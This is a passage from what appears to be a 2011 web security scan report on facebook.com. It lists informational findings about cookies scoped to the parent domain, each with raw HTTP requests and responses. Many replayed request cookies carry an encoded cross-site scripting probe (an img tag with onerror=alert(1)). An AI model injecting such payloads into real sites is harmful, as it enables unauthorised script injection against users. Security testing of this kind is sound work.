Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613617025%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613618111%2C%22act%22%2C1304613617025%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fajax%2Freg_birthday_help.php%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C437%2C508%2C12%2C981%2C16%5D
Content-Length: 111

action=postload_focus&reg_instance=nozCTU1UnNH2U_CPdhUk4wOq&abtest_registration_group=1&fb_dtsg=yeP5w&lsd=zTWKd

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 34
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.52.198.51
X-Cnection: close
Date: Thu, 05 May 2011 11:43:30 GMT

for (;;);{"__ar":1,"payload":null}

10.28. http://www.facebook.com/aol previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/aol

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aol HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.29. http://www.facebook.com/aolradio previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/aolradio

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aolradio HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.30. http://www.facebook.com/badges previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/badges

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badges HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/badges/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.119
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Content-Length: 0

10.31. http://www.facebook.com/burkerkink previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/burkerkink

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /burkerkink HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.63
Connection: close
Date: Thu, 05 May 2011 11:42:28 GMT
Content-Length: 42388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.32. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 04-Jun-2011 10:56:36 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 04-Jun-2011 10:56:36 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.222.101
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 0

10.33. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /careers/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.122
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 20487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.34. http://www.facebook.com/deedee.perez1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/deedee.perez1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deedee.perez1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.57
Connection: close
Date: Thu, 05 May 2011 11:42:21 GMT
Content-Length: 77523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.35. http://www.facebook.com/directory/pages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/pages/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.51
Connection: close
Date: Thu, 05 May 2011 11:42:59 GMT
Content-Length: 44671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.36. http://www.facebook.com/directory/people/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/people/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.146.25
Connection: close
Date: Thu, 05 May 2011 11:42:57 GMT
Content-Length: 34484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.37. http://www.facebook.com/facebook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/facebook

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /facebook HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.38. http://www.facebook.com/fayse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/fayse

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fayse HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.21
Connection: close
Date: Thu, 05 May 2011 11:42:45 GMT
Content-Length: 59713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.39. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find-friends HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.218.112
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 101636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.40. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php; act=1304613654644%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613654661%2C%22act%22%2C1304613654644%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%3Fref%3Dpf%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C361%2C635%2C12%2C981%2C16%5D

Response

10.41. http://www.facebook.com/gale.l.schenk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/gale.l.schenk

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gale.l.schenk HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.65
Connection: close
Date: Thu, 05 May 2011 11:42:46 GMT
Content-Length: 113481

